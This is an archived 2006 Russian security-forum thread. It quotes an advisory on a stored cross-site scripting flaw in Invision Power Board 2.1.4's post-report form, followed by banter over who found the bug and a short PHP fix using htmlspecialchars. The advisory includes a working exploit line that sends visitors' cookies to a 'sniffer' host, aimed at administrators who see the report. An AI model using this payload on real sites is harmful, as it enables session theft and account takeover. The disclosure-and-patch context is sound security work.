Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Active XSS in Invision Power Board 2.1.4 (https://forum.antichat.xyz/showthread.php?t=15298)

k00p3r 02.03.2006 22:37

Active XSS in Invision Power Board 2.1.4
 
Команда Cyber Lords, нашла новую багу в IPB.
Цитата:

Advisory: Active XSS in Invision Power Board 2.1.4

Уязвимость/Vulnerability: Межсайтовый скриптинг/Cross Site Scripting

Нет фильтрации входящих данных. Возможно проведение атаки межсайтовый скриптинг, отослав в форме жалобы на сообщение запрос вида: "<script>alert()</script>". С помощью данной атаки возможна утечка конфиденциальных данных пользователя на сторонний сервер.

Форма находится по адресу http://forum/index.php?act=report&t=123&p=123&st=0

Exploit: <script>img = new Image(); img.src = "http://sniffer/file.php?"+document.cookie;</script>

P.S. Далее у всей администрации форума, автоматически появится уведомление о жалобе.

Mobile 02.03.2006 23:18

Сам нашёл уязвимость?...

GreenBear 02.03.2006 23:24

Цитата:

Команда Cyber Lords, нашла новую багу в IPB.
=))))

PinkPanther 03.03.2006 00:53

Первоначально багу нашел наш Морф, о чем ГМемберы могут видеть тут: http://forum.antichat.ru/thread11524.html

Mobile 03.03.2006 01:39

Морф красавец!...

Morph 03.03.2006 18:19

Гы воть так нех приватные баги распространять вот блин тоже...................
Докатились............


ХРАНИТЬ ТАКОЕ НАДо!

:))

D1mOn 03.03.2006 18:50

да зря выложили!

Mobile 03.03.2006 19:00

Цитата:

Сообщение от k00p3r
Команда Cyber Lords, нашла новую багу в IPB.

Тоесть можно код сниффера залить, и всё?

GreenBear 03.03.2006 20:51

Защита.
Открыть sources/action_public/misc/contact_member.php
Найти:
PHP код:

$this->lib->msg_post    $this->email->message

(431 строка по умолчанию)

Заменить на:
PHP код:

$this->lib->msg_post    htmlspecialchars($this->email->message); 



Время: 15:33